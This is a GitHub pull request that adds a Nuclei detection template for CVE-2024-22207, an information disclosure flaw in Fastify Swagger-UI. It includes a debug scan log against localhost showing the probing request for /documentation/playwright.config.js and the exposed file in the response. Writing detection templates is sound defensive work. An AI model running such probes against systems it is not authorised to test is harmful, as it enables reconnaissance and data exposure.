Create CVE-2024-22207.yaml

[DhiyaneshGeek]

Template / PR Information

• Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
• References:

Template Validation

I've validated this template locally?

• YES
• NO

Additional Details (leave it blank if not applicable)

Additional References:

• Nuclei Template Creation Guideline
• Nuclei Template Matcher Guideline
• Nuclei Template Contribution Guideline
• PD-Community Discord server

[DhiyaneshGeek]

nuclei -u http://127.0.0.1:3000 -t test.yaml -vv -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.2

		projectdiscovery.io

[INF] Current nuclei version: v3.3.2 (latest)
[INF] Current nuclei-templates version: v10.0.0 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 255
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2024-22207] Fastify Swagger-UI - Information Disclosure (@dhiyaneshdk,@iamnoooob) [medium]
[INF] [CVE-2024-22207] Dumped HTTP request for http://127.0.0.1:3000/documentation/playwright.config.js

GET /documentation/playwright.config.js HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (Debian; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2024-22207] Dumped HTTP response http://127.0.0.1:3000/documentation/playwright.config.js

HTTP/1.1 200 OK
Connection: close
Content-Length: 728
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Content-Type: application/javascript; charset=UTF-8
Date: Mon, 23 Sep 2024 12:30:16 GMT
Etag: W/"2d8-1921ec4fd2b"
Last-Modified: Mon, 23 Sep 2024 12:04:39 GMT

'use strict'

const { defineConfig, devices } = require('@playwright/test')

const PORT = 3000

/**
 * @see https://playwright.dev/docs/test-configuration
 */
module.exports = defineConfig({
  testDir: './e2e',
  fullyParallel: true,
  forbidOnly: !!process.env.CI,
  retries: process.env.CI ? 2 : 0,
  workers: process.env.CI ? 1 : undefined,
  reporter: 'html',
  use: {
    baseURL: `http://127.0.0.1:${PORT}/documentation`,
    trace: 'on-first-retry'
  },
  projects: [
    {
      name: 'chromium',
      use: { ...devices['Desktop Chrome'] }
    }
  ],
  webServer: {
    command: `PORT=${PORT} npm run test:e2e:command`,
    url: `http://127.0.0.1:${PORT}/documentation`,
    reuseExistingServer: !process.env.CI
  }
})
[CVE-2024-22207:word-1] [http] [medium] http://127.0.0.1:3000/documentation/playwright.config.js
[CVE-2024-22207:status-2] [http] [medium] http://127.0.0.1:3000/documentation/playwright.config.js